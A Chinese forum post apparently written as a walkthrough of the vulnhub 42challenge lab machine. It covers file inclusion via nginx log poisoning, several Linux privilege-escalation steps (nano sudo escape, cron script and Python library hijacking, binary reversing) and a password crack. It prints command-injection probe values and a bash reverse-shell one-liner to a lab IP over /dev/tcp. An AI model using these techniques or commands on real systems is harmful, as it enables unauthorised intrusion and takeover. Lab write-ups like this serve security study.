关闭
搜索
搜索
本版
帖子
用户
热搜:
程序员
简洁模式
高级模式
用户组: 游客
消息
提醒
新听众
我关注的
帖子
道具
勋章
任务
设置
退出
请
登录
后使用快捷导航
没有帐号?
立即注册
设为首页
收藏本站
开启辅助访问
切换到窄版
登录
or
立即注册
快捷导航
搜索
首页
论坛
BBS
MCU单片机技术
程序员交流
记一次渗透后运用多种方式提权实战
[复制链接]
作者:
人物_987
版块:
›
嵌入式操作系统
›
linux
发布时间:
2021-3-28 17:54:24
2040
0
返回列表
人物_987
当前离线
中级会员
中级会员, 积分 237, 距离下一级还需 263 积分
中级会员
中级会员, 积分 237, 距离下一级还需 263 积分
积分
237
发消息
楼主
电梯直达
人物_987
发表于 2021-3-28 17:54:24
|
只看该作者
|
倒序浏览
|
阅读模式
此文 由作者:windcctv提供。
近期在学习Linux提权,完成了vulnhub上的42challenge靶场。该靶场在web渗透阶段表现的中规中矩,但在获得shell后的提权过程中,表现很出色。提权题目设计的逻辑严谨(不会出现突然的脑洞让你卡住),注重基础知识的考察,要求的知识面也很广,涉及到密码破解、程序逆向分析、第三方应用提权、进程提权、ssh免密登录、Linux ACL访问控制权限等方面的知识,属于不可多得的精品之作,下面就开始这次靶场实战之旅。
利用命令arp-scan -l来发现靶机,然后看看靶机开放了哪些端口;
在利用nmap的脚本探测下端口可能存在的漏洞;
发现就开放了2个端口,22端口显然不是这里突破的重点,重点应该时web端口。
看到这个第一直觉时命令执行漏洞,尝试输入:
127.0.0.1&whoami、127.0.0.1|whoami、127.0.0.1&&whoami、127.0.0.1||whoami都没有正确返回。后来有新的发现:
看到这个,联想到文件包含;
原来是本地包含,下面就利用日志来getshell。尝试了包含/var/log/auth.log,没有成功,那就不能利用ssh登录日志来获取shell,我们通过nmap扫描知道web的中间件是nginx,那我们就可以利用nginx日志来getshell。
访问日志可以读取到;
写入shell:
curl -A "" http://192.168.0.40/index.php
通过文件包含触发反弹;
接收反弹;
错误日志也可读取到;
写入shell;
通过文件包含触发反弹;
接收反弹;
这里也可以将nc的反弹命令改为其他的反弹方式,比如一句话、php反弹或bash反弹都可以,就不逐个演示了,大家根据实际情况选择。
弹回了shell,下一步就该提权了,也到了本靶场的精华之处,开始提权的漫长之旅。
三、辅助脚本利用有了www-data用户的shell,先尝试下有没有suid提权的可能;
没有线索,看下用户文件;
后来实践证明是要依次由这5个用户逐个提权,最后才能提权到root用户。
先上内核辅助脚本 linux-exploit-suggester.sh
要是内核可以提权,这靶场就没啥意思了;
在看看辅助脚本linpeas.sh的结果;(结果很多,就给出研判后可用的结果)
找了半天,去看看备份的密码文件。
可以看到用户的密码文件;
然后用john来破解;
爆破作为最基础的一种方式,还是需要掌握对shadow文件的爆破方法。现在可以开心的ssh
连接了,进入下一个提权。
ssh连接后,sudo -l 没有发现,但suid发现线索;
运行下试试;
祭出神器IDA来看看;
看的还是累,上gdb;
进入关键函数try,继续看;
在内存里发现了正确的密码;
提权成功,进行下一个阶段。
这里考的是nano的sudo提权;
首先 sudo -u maria /bin/nano 进入界面;
然后在键盘上按住ctrl+r,
接着再按住ctrl+x;
现在就可以输入命令了;
完成了提权;
因为看着不方便,所以可以用bash重新反弹个通道;
echo "bash -i >& /dev/tcp/192.168.0.3/6666 0>&1" | bash
还可以用高端一点的方法,ssh免密登录。
ssh免密登录kali下生成自己的公钥,口令为空;
靶机上创建 .ssh文件夹;
靶机上把kali的公钥放到认证文件里;
ssh免密登录;
接下来进行下一步提权。
七、进程提权1、修改源文件提权
sudo因为没有密码,所以无法查看,suid没发现明显的线索,之前sudo -l和suid两种提权方式都试过了,这里应该考察其他方式了;
也没有考到计划任务提权;
运行下脚本pspy64试试;
发现线索,uid=1003 就是pedro用户;
既然Reporting_System_Info.sh定期运行,于是想到如果能修改该程序的内容,那就可以获得shell。
图中后面的+号表示 Linux ACL访问控制权限,类似于 Windows 系统中分配权限的方式,单独指定用户并单独分配权限,这样就解决了用户身份不足的问题。
可以看到我们不能直接修改Reporting_System_Info.sh,但是根据源码,程序要运行Send_Reporting_Email.sh,我们可以伪造/home/maria/Send_Reporting_Email.sh这个文件,也同样会执行;
到这里这一步提权完成,继续进行下一步;
2、修改python库文件提权根据前面进程的监控发现;
uid=1004就是laura用户,根据前面的思路,我们同样想修改程序,先来看看程序的权限;
因为源文件不可以修改,思路是去修改源文件里调用的python库文件;
找到库文件的位置,同时发现库文件是可以修改的;
写入shell,等待执行;
反弹成功;
到这里除了root外所有的用户都提权过一遍,加油!
看到sudo -l 直接提权到root,最后一关简单点,不多解释了。当然,如果你感觉最后一关太简单了,不符合终极boss的气质,也可以玩个加强版。
在目录下发现可疑文件;
把程序拷贝出来,祭出神器IDA分析;
加密程序;
对应的解密程序;
由此可以看出,加密其实就是把明文加5,解密就是把密文减5,这里可以直接写个程序来跑,此处我们直接用动态调试来解决。
先运行下看看;
在打开文件处下断点,准备修改打开文件的参数;因为不修改参数的结果已经看到了,并不是我们想要的结果;
获取了root用户的密码,验证一下试试;
由最开始的ssh登录后直接就能切换到root用户了;
至此,整个靶机就打穿了,回顾一下,感觉还是很有乐趣的,思路很常规,没有脑洞点,但基础知识的考察范围很广,并具有一定的规律性,值得多做总结。
本帖子中包含更多资源
您需要
登录
才可以下载或查看,没有帐号?
立即注册
收藏
0
相关帖子
•
Btrfs文件系统入门|Linux中国
•
架构师网络安全实战教程全方位高级网络安全课程
•
【干货】从lsof开始,深入理解Linux虚拟文件系统!
•
独立主机网站转移操作方式
•
Linux操作系统应用试题
•
DBA常用Linux命令
•
LinuxPC登陆天河二号基础操作
•
欲学鸿蒙必先懂Linux:逐项分析Linux目录树的5类18项构成
•
618在某宝上花298买来的Linux全解笔记,感觉4年Linux都白学了
•
【工程师分享】精简Linux的源代码
回复
使用道具
举报
返回列表
高级模式
B
Color
Image
Link
Quote
Code
表情
@朋友
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
回帖后跳转到最后一页
浏览过的版块
招聘&找工作
stm
快速回复
返回顶部
返回列表